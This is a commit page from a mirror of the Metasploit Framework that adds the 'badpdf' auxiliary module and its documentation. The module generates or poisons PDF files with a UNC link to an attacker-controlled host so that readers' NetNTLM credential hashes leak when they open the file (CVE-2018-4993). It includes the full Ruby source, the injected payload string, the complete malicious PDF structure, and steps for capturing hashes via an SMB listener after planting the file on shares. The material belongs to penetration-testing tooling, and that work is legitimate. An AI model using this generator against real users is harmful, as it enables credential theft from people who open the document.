infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #10148, Add New Module - Badpdf 

Merge branch 'land-10148' into upstream-master
4.x
bwatters-r7 2018-06-12 17:19:32 -05:00 committed by Metasploit
parent 0a19221af2
commit 7e2c1fae2c
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
2 changed files with 250 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

92
documentation/modules/auxiliary/fileformat/badpdf.md Normal file
View File

@ -0,0 +1,92 @@
This module will either create a blank pdf document which contains a UNC link which will connect back to LHOST if file FILENAME options is used
or if PDFINJECT option is used will try and inject the necessary UNC code into an existing PDF document.
## Vulnerable Application
Various PDF Readers. Note Adobe released the patch APSB18-09 to prevent this and
FoxIT after version 9.1 is no longer vulnerable.
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: ```use auxiliary/fileformat/badpdf```
4. Customise Options as required
5. Do: ```run```
6. A file pointing back to the listening host will then be generated.
7. Configure auxiliary/server/capture/smb or similar to capture hashes.
8. Upload the document to an open share or similar and wait for hashes.
## Options
**FILENAME**
This option allows you to customise the generated filename.
This can be changed using set FILENAME test.pdf
**LHOST**
This option allows you to set the IP address of the SMB Listener that the document points to
This can be changed using set LHOST 192.168.1.25
**PDFINJECT**
This option allows you to inject the UNC code into an existing PDF document
This can be changed using set PDFINJECT /path/to/file/pdf.pdf
## Scenarios
### Microsoft Windows
```
Console output
```
```
msf auxiliary(fileformat/badpdf) > show info
Name: BADPDF Malicious PDF Creator
Module: auxiliary/fileformat/badpdf
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Richard Davy - secureyourit.co.uk
CheckPoint researchers - Assaf Baharav, Yaron Fruchtmann, Ido Solomon
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME no Filename
LHOST yes Host listening for incoming SMB/WebDAV traffic
PDFINJECT no Path and filename to existing PDF to inject UNC link code into
Description:
This module can either creates a blank PDF file which contains a UNC
link which can be used to capture NetNTLM credentials, or if the
PDFINJECT option is used it will inject the necessary code into an
existing PDF document if possible.
References:
https://cvedetails.com/cve/CVE-2018-4993/
https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/
msf auxiliary(fileformat/badpdf) >
msf auxiliary(fileformat/badpdf) > set filename test.pdf
filename => test.pdf
msf auxiliary(fileformat/badpdf) > set lhost 192.168.1.28
lhost => 192.168.1.28
msf auxiliary(fileformat/badpdf) > exploit
[+] test.pdf stored at /root/.msf4/local/test.pdf
[\*] Auxiliary module execution completed
msf auxiliary(fileformat/badpdf) > set filename ""
filename =>
msf auxiliary(fileformat/badpdf) > set pdfinject /root/Desktop/example.pdf
pdfinject => /root/Desktop/example.pdf
msf auxiliary(fileformat/badpdf) > exploit
[+] Malicious file writen to /root/Desktop/example_malicious.pdf
[\*] Auxiliary module execution completed
msf auxiliary(fileformat/badpdf) >
```

158
modules/auxiliary/fileformat/badpdf.rb Normal file
View File

@ -0,0 +1,158 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'BADPDF Malicious PDF Creator',
'Description' => '
This module can either creates a blank PDF file which contains a UNC link which can be used
to capture NetNTLM credentials, or if the PDFINJECT option is used it will inject the necessary
code into an existing PDF document if possible.
',
'License' => MSF_LICENSE,
'Author' =>
[
'Assaf Baharav', # Code provided as POC by CheckPoint
'Yaron Fruchtmann', # Code provided as POC by CheckPoint
'Ido Solomon', # Code provided as POC by CheckPoint
'Richard Davy - secureyourit.co.uk', # Metasploit
],
'Platform' => ['win'],
'References' =>
[
['CVE', '2018-4993'],
['URL', 'https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/']
])
)
register_options(
[
OptAddress.new('LHOST', [true, 'Host listening for incoming SMB/WebDAV traffic', nil]),
OptString.new('FILENAME', [false, 'Filename']),
OptPath.new('PDFINJECT', [false, 'Path and filename to existing PDF to inject UNC link code into'])
]
)
end
def run
if datastore['PDFINJECT'].to_s.end_with?('.pdf') && datastore['FILENAME'].to_s.end_with?('.pdf')
print_error 'Please configure either FILENAME or PDFINJECT'
elsif !datastore['PDFINJECT'].nil? && datastore['PDFINJECT'].to_s.end_with?('.pdf')
injectpdf
elsif !datastore['FILENAME'].nil? && datastore['FILENAME'].to_s.end_with?('.pdf')
createpdf
else
print_error 'FILENAME or PDFINJECT must end with '.pdf' file extension'
end
end
def injectpdf
# Payload which gets injected
inject_payload = "/AA <</O <</F (\\\\\\\\#{datastore['LHOST']}\\\\test)/D [ 0 /Fit]/S /GoToE>>>>"
# if given path doesn't exist display error and return
unless File.exist?(datastore['PDFINJECT'])
# If file not found display error message
print_error "File doesn't exist #{datastore['PDFINJECT']}"
return
end
# Read in contents of file
content = File.read(datastore['PDFINJECT'])
# Check for place holder - below ..should.. cover most scenarios.
newdata = ''
[2, 4, 6, 8].each do |pholder|
unless content.index("/Contents #{pholder} 0 R").nil?
# If place holder exists create new file content
newdata = content[0..(content.index("/Contents #{pholder} 0 R") + 14)] + inject_payload + content[(content.index("/Contents #{pholder} 0 R") + 15)..-1]
break
end
end
# Display error message if we couldn't poison the file
if newdata.empty?
print_error 'Could not find placeholder to poison file this time....'
return
end
# Create new filename by replacing .pdf with _malicious.pdf
newfilename = "#{datastore['PDFINJECT'].gsub(/\.pdf$/, '')}_malicious.pdf"
# Write content to file
File.open(newfilename, 'wb') { |file| file.write(newdata) }
# Check file exists and display path or error message
if File.exist?(newfilename)
print_good("Malicious file writen to: #{newfilename}")
else
print_error 'Something went wrong creating malicious PDF file'
end
end
def createpdf
# Code below taken POC provided by CheckPoint Research
pdf = ''
pdf << "%PDF-1.7\n"
pdf << "1 0 obj\n"
pdf << "<</Type/Catalog/Pages 2 0 R>>\n"
pdf << "endobj\n"
pdf << "2 0 obj\n"
pdf << "<</Type/Pages/Kids[3 0 R]/Count 1>>\n"
pdf << "endobj\n"
pdf << "3 0 obj\n"
pdf << "<</Type/Page/Parent 2 0 R/MediaBox[0 0 612 792]/Resources<<>>>>\n"
pdf << "endobj\n"
pdf << "xref\n"
pdf << "0 4\n"
pdf << "0000000000 65535 f\n"
pdf << "0000000015 00000 n\n"
pdf << "0000000060 00000 n\n"
pdf << "0000000111 00000 n\n"
pdf << "trailer\n"
pdf << "<</Size 4/Root 1 0 R>>\n"
pdf << "startxref\n"
pdf << "190\n"
pdf << "3 0 obj\n"
pdf << "<< /Type /Page\n"
pdf << " /Contents 4 0 R\n"
pdf << " /AA <<\n"
pdf << " /O <<\n"
pdf << " /F (\\\\\\\\#{datastore['LHOST']}\\\\test)\n"
pdf << " /D [ 0 /Fit]\n"
pdf << " /S /GoToE\n"
pdf << " >>\n"
pdf << " >>\n"
pdf << " /Parent 2 0 R\n"
pdf << " /Resources <<\n"
pdf << " /Font <<\n"
pdf << " /F1 <<\n"
pdf << " /Type /Font\n"
pdf << " /Subtype /Type1\n"
pdf << " /BaseFont /Helvetica\n"
pdf << " >>\n"
pdf << " >>\n"
pdf << " >>\n"
pdf << ">>\n"
pdf << "endobj\n"
pdf << "4 0 obj<< /Length 100>>\n"
pdf << "stream\n"
pdf << "BT\n"
pdf << "/TI_0 1 Tf\n"
pdf << "14 0 0 14 10.000 753.976 Tm\n"
pdf << "0.0 0.0 0.0 rg\n"
pdf << "(PDF Document) Tj\n"
pdf << "ET\n"
pdf << "endstream\n"
pdf << "endobj\n"
pdf << "trailer\n"
pdf << "<<\n"
pdf << " /Root 1 0 R\n"
pdf << ">>\n"
pdf << "%%EOF\n"
# Write data to filename
file_create(pdf)
end
end